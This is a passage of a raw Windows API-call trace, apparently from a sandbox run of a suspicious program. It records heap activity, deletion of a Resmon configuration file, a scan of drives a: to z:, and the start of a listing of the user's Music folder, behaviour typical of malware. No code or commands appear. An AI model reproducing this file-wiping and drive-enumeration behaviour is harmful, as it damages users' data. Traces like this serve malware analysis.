hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0243.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0243.610] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0243.610] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0243.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0243.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0243.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e54858 [0243.611] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", lpFilePart=0x8cedf4*="Resmon.ResmonCfg") returned 0x2e [0243.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0243.611] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg")) returned 0x20 [0243.611] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 0xa87510 [0243.611] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg")) returned 1 [0243.613] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 0 [0243.613] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0243.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0243.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0243.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0243.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.614] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.614] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0243.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0243.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0243.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0243.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0243.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e54858 [0243.615] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", lpFilePart=0x8cf650*="Resmon.ResmonCfg") returned 0x2e [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0243.615] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg")) returned 0xffffffff [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0243.615] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0243.616] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0243.616] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0243.616] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0243.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0243.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0243.616] CharLowerBuffW (in: lpsz="FIXED", cchLength=0x5 | out: lpsz="fixed") returned 0x5 [0243.616] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0243.617] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0243.617] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0243.617] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0243.617] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0243.617] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0243.618] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0243.618] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0243.618] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0243.657] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0243.657] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0243.657] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0243.658] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0243.658] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0243.658] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0243.658] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0243.658] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0243.659] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0243.659] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0243.659] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0243.659] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0243.659] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0243.659] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0243.660] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0243.660] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0243.660] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0243.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0243.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0243.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0243.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0243.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0243.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0243.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0243.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.662] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0243.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0243.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0243.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0243.664] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.664] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="c:", cchCount2=2) returned 2 [0243.664] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.665] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.665] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.665] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.665] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0243.665] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3e0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0243.666] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.666] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0243.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e51160 [0243.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e51160, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0243.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Music", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e699e8 [0243.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Music", cchWideChar=22, lpMultiByteStr=0x2e699e8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Music", lpUsedDefaultChar=0x0) returned 22 [0243.667] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 